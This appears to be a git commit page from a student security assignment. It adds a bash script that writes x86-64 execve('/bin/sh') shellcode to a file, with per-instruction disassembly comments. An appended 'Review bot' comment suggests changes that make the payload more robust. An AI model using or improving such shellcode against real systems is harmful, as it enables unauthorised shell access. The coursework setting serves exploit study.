path: root/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
authorCamil Staps2015-12-09 13:23:26 +0000
committerCamil Staps2015-12-09 13:23:26 +0000
commit78e74ea02fd52962290e2a1b816a90d9b9514a82 (patch)
treefa213fd71f72c6de405556e62551942f0e3f7a68 /CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
parentAssignment 2, 3 (diff)
Assignment 4
Diffstat (limited to 'CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh')
-rwxr-xr-xCamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh17
1 files changed, 17 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
new file mode 100755
index 0000000..63fa491
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
+
+# This shellcode translates as follows:
+#
+# "\x48\x31\xd2" // xor %rdx, %rdx
+# "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
+# "\x48\xc1\xeb\x08" // shr $0x8, %rbx
+# "\x53" // push %rbx
+# "\x48\x89\xe7" // mov %rsp, %rdi
+# "\x52" // push %rdx // There is an error in the "original", push %rax will push
+# // some random stuff on the stack, instead of NULL, which will
+# // cause the execve to fail with EFAULT (-14). See man execve.
+# "\x57" // push %rdi
+# "\x48\x89\xe6" // mov %rsp, %rsi
+# "\xb0\x3b" // mov $0x3b, %al
+# "\x0f\x05" // syscall \ No newline at end of file
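Review bot: `echo -e` on the first line writes a trailing 0x0a after the 30 bytes listed in the comments, so the `shellcode` file is 31 bytes; `echo -e` is also not portable across shells, whereas the bash `printf` builtin honours `\xHH` and adds no newline: `printf '\x48\x31\xd2...\x0f\x05' > shellcode`. Separately, `\xb0\x3b` (`mov $0x3b, %al`) only sets the low byte of rax, so the syscall number is correct only if the upper 56 bits of rax happen to be zero at the point the shellcode runs, which is not guaranteed by the preceding instructions; inserting `\x31\xc0` (`xor %eax, %eax`) before `\xb0\x3b` costs two NUL-free bytes and removes that dependence on the caller's register state. If the injected buffer length is tuned to the current file size, adjust it for those two bytes and the dropped newline.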